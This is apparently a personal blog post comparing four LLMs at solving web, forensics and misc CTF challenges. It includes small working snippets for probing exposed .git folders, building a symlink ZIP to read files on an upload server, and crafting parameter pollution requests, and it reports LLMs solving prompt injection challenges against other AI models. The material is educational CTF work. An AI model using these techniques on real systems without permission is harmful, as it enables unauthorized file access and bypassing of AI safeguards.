I really like using Large Language Models (LLMs). One of my uses for them is solving CTFs.
Recently I started comparing a couple of them, especially since there have been some major updates lately.
I was curious and wanted to create a table that would compare their capabilities in solving CTFs. My significant other then asked me why not write an article about it, so here we are😉.
I have read some views that oppose using LLMs for CTFs. However, for me, using them is the same as googling and searching the web to learn and to find answers to the challenges or tasks we have. If we had the option to use Google much more efficiently and find the results we want right away, I believe most of us would take it.
Some people may say that LLMs solve the challenges for us, unlike searching the web, and some of that is true, but not always.
I would divide it into two situations:
When we are focusing on getting points or solving tasks: In this case, I see no problem with using all the tools we have in order to be the most efficient and do what we want in the fastest way possible.
When we want to learn and understand how to do things: From my experience, often (or even the vast majority of times), the answer is not presented right away and I think that:
By getting the LLM output and the results, we also learn by reading the solution.
We still think and learn because a lot of times the LLM gives us only leads and we have to test them and continue using the hints and leads we have received. So we will still try to solve the challenges on our own.
Sometimes we simply request the model to explain a code snippet, a certain technology, etc., and not really ask it to solve the challenge.
The Models I Used
Some of the top and most interesting LLMs that I was familiar with include:
OpenAI GPT 4.0
Claude 3 Opus
Google Gemini Pro 1.5
Pi - Inflection-2.5
There are some additional LLMs that I did not test or partially tested. For example:
Microsoft Copilot: it uses GPT 4.0, which is already part of the comparison, so I assumed there would be no major differences.
Some LLMs that were just not good enough.
Google Gemini Ultra 1.0, which should be Google's best model and requires a monthly payment. It is impossible to work with because its security mechanism frequently stops conversations or deletes links. It is a bummer, since I believe Gemini could help a lot. Here are some of its behaviors:
The Comparison
The following table shows which LLMs succeeded in solving the different challenges.
A couple of notes:
The results combine which LLMs succeeded in solving the challenges and how many prompts (hits) it took. The main goal was to understand which model is the best for CTF competitions.
I usually sent the same prompt to all the LLMs, including the CTF description, any provided files or code, and my request. Also, I gave each of them a similar number of attempts before considering the result as failed.
The challenges I used for comparison came from different CTFs, which I had already solved or had solutions for. They were mainly Web and Forensics challenges, because these are the categories I usually focus on, but I know it is possible to solve or get help for other categories as well.
I will provide a general description and notes for each challenge in the section following the table.
Challenge | GPT 4.0 | Claude Opus | Gemini Pro 1.5 | Pi 2.5 |
.git Challenge | 1 hit (.git and Directory Brute Forcing) | Directory Brute Forcing | Directory Brute Forcing | Directory Brute Forcing |
Secret PNG in PDF | 3 hits | 3 hits | | 3 hits - instructed to extract only JPEG |
Zip Slip Symlink | 1 hit | 1 hit | 1 hit | |
JS/LocalStorage Manipulation | 1 hit | 1 hit | 1 hit | 1 hit |
Prototype Pollution | Only identified | 5 hits - almost exploited | Only identified | Only identified |
Parameter Pollution | 2 hits | 1 hit | ||
Message in RGB Values | 3 hits | |||
LLM Token IDs | Suggested other models | |||
Hidden Data in ShellBags | 1 hit | |||
Prompt Injection #1 | 5 hits | 2 hits | 5 hits | |
Prompt Injection #2 | 7 hits | 5 hits |
Challenge Descriptions for Reference (skip to conclusions if desired)
1. .git Challenge - Only a simple website is accessible. The solution is to download the exposed .git folder and search the previous commits for the flag.
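A minimal sketch of the first step, checking whether a site exposes its .git folder. The host name, the list of paths, and both helper names are my own assumptions for illustration; the actual requests are left out so the snippet stays offline.

```python
from urllib.parse import urljoin

# Files that exist in almost every Git repository (an illustrative selection).
GIT_PROBE_PATHS = [".git/HEAD", ".git/config", ".git/index", ".git/logs/HEAD"]


def git_probe_urls(base_url):
    """Build the URLs to request when checking for an exposed .git folder."""
    # urljoin drops the last path segment unless the base ends with "/".
    base = base_url if base_url.endswith("/") else base_url + "/"
    return [urljoin(base, path) for path in GIT_PROBE_PATHS]


def looks_like_git_head(body):
    """A real .git/HEAD holds either 'ref: refs/...' or a 40-hex commit hash."""
    text = body.strip()
    if text.startswith("ref: refs/"):
        return True
    return len(text) == 40 and all(c in "0123456789abcdef" for c in text)


# Hypothetical target; replace with the challenge URL.
urls = git_probe_urls("http://ctf.example")
```

If the response for `.git/HEAD` passes `looks_like_git_head`, the folder is probably downloadable, and the history can then be inspected with ordinary Git commands such as `git log -p`.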
2. Secret PNG in PDF - A PDF file contains a secret PNG with the flag but does not display it.
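One way to approach this kind of challenge is to carve the image straight out of the file's bytes. The sketch below assumes the PNG is stored uncompressed inside the PDF; if it sits inside a compressed stream, this will find nothing and a PDF-aware extraction tool is needed instead. The function name is hypothetical.

```python
# Every PNG file starts with this 8-byte signature.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# The closing IEND chunk: zero length, the type "IEND", then its fixed CRC.
PNG_TRAILER = b"\x00\x00\x00\x00IEND\xaeB`\x82"


def carve_pngs(blob):
    """Return every byte range that starts with the PNG signature and ends at IEND."""
    found = []
    start = blob.find(PNG_SIGNATURE)
    while start != -1:
        end = blob.find(PNG_TRAILER, start)
        if end == -1:
            break  # signature without a trailer: truncated or a false positive
        end += len(PNG_TRAILER)
        found.append(blob[start:end])
        start = blob.find(PNG_SIGNATURE, end)
    return found
```

Typical usage would be reading the PDF with `open(path, "rb").read()`, passing the bytes to `carve_pngs`, and writing each result to its own `.png` file.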
3. Zip Slip Symlink - A website that lets you upload a ZIP file, extracts it, and displays the extracted files. The solution is to upload a ZIP file containing a symbolic link that points to the flag's location.
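A sketch of how such an archive could be built with Python's standard library. The entry name and the `/flag.txt` target are hypothetical, and whether the server actually recreates the link depends on the extractor it uses, so treat this as an illustration rather than a guaranteed exploit.

```python
import io
import stat
import zipfile


def build_symlink_zip(link_name, target):
    """Return the bytes of a ZIP whose single entry is a symlink to `target`."""
    info = zipfile.ZipInfo(link_name)
    info.create_system = 3  # 3 = Unix, so extractors read the mode bits below
    # The upper 16 bits of external_attr hold the Unix mode; S_IFLNK marks a symlink.
    info.external_attr = (stat.S_IFLNK | 0o777) << 16
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as archive:
        # For a symlink entry, the stored data is the path it points to.
        archive.writestr(info, target)
    return buffer.getvalue()


# Hypothetical names: the real flag location comes from the challenge.
payload = build_symlink_zip("link.txt", "/flag.txt")
```

The same archive can also be produced on the command line with `zip --symlinks`, which stores links instead of following them.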
4. Simple JS/LocalStorage Manipulation - A button needs to be pressed many times to reveal the flag, and the click count is stored in LocalStorage. Everything is on the client side.
5. Prototype Pollution - A website containing two main functionalities. Claude Solution (the correct solution is without "secret"):
6. Parameter Pollution - A website that allows registering, logging in, and donating money. As a user, you start with $1000 and can only donate to Jeff Bezos, not to other users. The goal is to gain more than a certain amount of money to obtain the flag.
The solution was to create a couple of users and send money to one of them using:
to=lisanalgaib&to=orel&currency=1000
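The sketch below shows why a duplicated parameter can matter, reading the last parameter in the request as `currency`. It assumes (the challenge source is not shown here) that one part of the application reads the first `to` value while another reads the last one; the `first_wins` and `last_wins` names are only illustrative.

```python
from urllib.parse import parse_qs, urlencode

# A list of pairs (not a dict) lets the same key appear twice.
params = [("to", "lisanalgaib"), ("to", "orel"), ("currency", "1000")]
body = urlencode(params)

# parse_qs keeps every value for a repeated key, in order.
parsed = parse_qs(body)

# Different frameworks pick different values when a key is repeated.
first_wins = {key: values[0] for key, values in parsed.items()}
last_wins = {key: values[-1] for key, values in parsed.items()}
```

Here `first_wins["to"]` and `last_wins["to"]` differ, which is exactly the disagreement a parameter pollution attack relies on: a check applied to one value does not protect the other.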
7. Message in RGB Values - The challenge provided a small square image with random colors in each pixel:
The solution is to take each pixel's RGB values, sum them, and convert each sum to ASCII, which results in a message containing the flag.
Note: all the tested LLMs mentioned solutions related to RGB values, but only ChatGPT suggested summing them.
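A small sketch of the summing idea, assuming one character per pixel and pixels read left to right, top to bottom. The function name and the printable-range filter are my own additions; the pixel list would normally come from an imaging library such as Pillow.

```python
def decode_rgb_sums(pixels):
    """Turn each (R, G, B) pixel into one character via chr(R + G + B)."""
    chars = []
    for r, g, b in pixels:
        total = r + g + b
        # Keep only printable ASCII so stray pixels do not garble the output.
        if 32 <= total <= 126:
            chars.append(chr(total))
    return "".join(chars)


# Toy pixels whose sums are 67, 84 and 70, plus one white pixel that is skipped.
sample = [(20, 30, 17), (40, 40, 4), (10, 50, 10), (255, 255, 255)]
message = decode_rgb_sums(sample)
```

With the toy pixels above, `message` is `"CTF"`.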
8. LLM Token IDs - For this challenge we were provided with LLM tokens: [2864, 35, 1182, 37, 90, 28936, 8401, 821, 2957, 5677, 265, 7037, 40933, 29415, 92].
The solution was to find the correct model that translates these tokens to the flag.
While ChatGPT didn't solve it, it suggested trying different models and understood it needs to be translated to words/the flag.
For some reason Claude acted like GPT 3.5 and was sure that the flag is UMDCTF{hackerman}
Gemini 1.5 went too far and suggested unrelated solutions.
And Pi was sure the flag is UMDCTF{DontUnderestimateVladimirHarkonnen} 🤦🏻♀️
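The "try different models" lead can be sketched as a loop over candidate tokenizers that keeps only the decodings shaped like a flag. The `UMDCTF{...}` pattern is inferred from the guesses above, and the two decoders here are toy stand-ins; in practice each entry would wrap a real tokenizer's decode function.

```python
import re

# Flag shape inferred from the models' guesses (an assumption).
FLAG_PATTERN = re.compile(r"^UMDCTF\{[^{}]+\}$")


def find_matching_decoders(token_ids, decoders):
    """Return {name: text} for every decoder whose output looks like a flag."""
    matches = {}
    for name, decode in decoders.items():
        try:
            text = decode(token_ids)
        except Exception:
            # An ID outside this vocabulary suggests it is the wrong tokenizer.
            continue
        if FLAG_PATTERN.match(text):
            matches[name] = text
    return matches


# Toy vocabularies for illustration only; they are not real model vocabularies.
toy_vocab = {1: "UMDCTF", 2: "{", 3: "toy", 4: "}"}
toy_decoders = {
    "toy_a": lambda ids: "".join(toy_vocab[i] for i in ids),
    "toy_b": lambda ids: "".join(chr(65 + i) for i in ids),
}
toy_result = find_matching_decoders([1, 2, 3, 4], toy_decoders)
```

Only `toy_a` produces a flag-shaped string here, so `toy_result` contains a single entry. The same filter applied to real tokenizers narrows down which model the IDs belong to.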
9. Hidden Data In ShellBags - The challenge provided a VDI file and we had to find some deleted information that still exists in ShellBags (https://www.hackingarticles.in/forensic-investigation-shellbags/).
Gemini was the only one that suggested a correct and quick solution.
Claude was pretty close but its solution did not work for me.
10. Prompt Injection #1 - The LLM should not generate any code.
Claude Opus refused to help, considering the request unethical hacking.
11. Prompt Injection #2 - The LLM should not display the password.
Claude Opus refused to help, considering the request unethical hacking.
Conclusions and Final Thoughts
In conclusion, here are the results (excluding the partial solutions):
Model | Number of Successes | Web Challenges | Forensics Challenges | Misc Challenges |
GPT 4.0 | 7 | 3/4 | 3/4 | 1/3 |
Claude Opus | 5 | 4/4 | 1/4 | 0/3 |
Gemini Pro 1.5 | 4 | 1/4 | 1/4 | 2/3 |
Pi 2.5 | 4 | 2/4 | 0/4 | 2/3 |
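As a quick sanity check, the per-category counts in the table can be summed to reproduce the "Number of Successes" column. The dictionary layout and variable names below are just one hypothetical way to hold the numbers.

```python
# (solved, attempted) per category, copied from the table above.
results = {
    "GPT 4.0": {"web": (3, 4), "forensics": (3, 4), "misc": (1, 3)},
    "Claude Opus": {"web": (4, 4), "forensics": (1, 4), "misc": (0, 3)},
    "Gemini Pro 1.5": {"web": (1, 4), "forensics": (1, 4), "misc": (2, 3)},
    "Pi 2.5": {"web": (2, 4), "forensics": (0, 4), "misc": (2, 3)},
}


def total_successes(per_category):
    """Add up the solved counts across all categories."""
    return sum(solved for solved, _attempted in per_category.values())


totals = {model: total_successes(cats) for model, cats in results.items()}
# Highest total first; ties keep the table's original order.
ranking = sorted(totals, key=totals.get, reverse=True)
```

The totals come out as 7, 5, 4 and 4, matching the table.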
General Impression
The models I found to be the most intelligent were GPT 4.0 and Claude Opus.
There are two main disadvantages of Claude compared to ChatGPT:
The fact that sometimes it will not help with prompts it perceives as malicious.
Its inability to run code, which limits its capabilities and sometimes leads to nonsense outputs (similar to GPT 3.5).
Moreover, it seems to me that GPT 4.0 is slightly better. There are times when it understands the context better and mentions one small additional piece of information that makes a huge difference.
There are some tasks that Gemini was really good at (it is also very good at summarizing the results, the leads, and the next steps), but in general it is not good enough, especially compared to GPT and Claude.
I really wish I could use Gemini Ultra for this, but its limitations make it impractical.
Although Pi 2.5 is perceived as less intelligent than the others (by intelligence, I mainly mean understanding and staying in context, having sufficient data, and solving the task), there were times it provided surprisingly helpful outputs, sometimes even more than other models.
Performance By Category
ChatGPT's results with web and forensics challenges are very good. I believe its poor score in the misc category is due to the small number of challenges I tried in this category, and to the fact that two of the three misc challenges were related to prompt injection, which it seems to be really bad at.
I actually believe ChatGPT should be good at misc challenges, since it can generate and run pretty good code, as I saw in other challenges not mentioned in this article.
Claude performed VERY well with the web challenges but quite poorly with the forensics challenges. One reason for its poor score in the misc category is its refusal to help with prompts it considers malicious (the prompt injection challenges).
Gemini and Pi had about the same results across all categories, so no special comments for them.
I hope you enjoyed reading.
Feel free to contact me if you have further insights, different opinions, or anything else.
Orel 🕵🏻♀️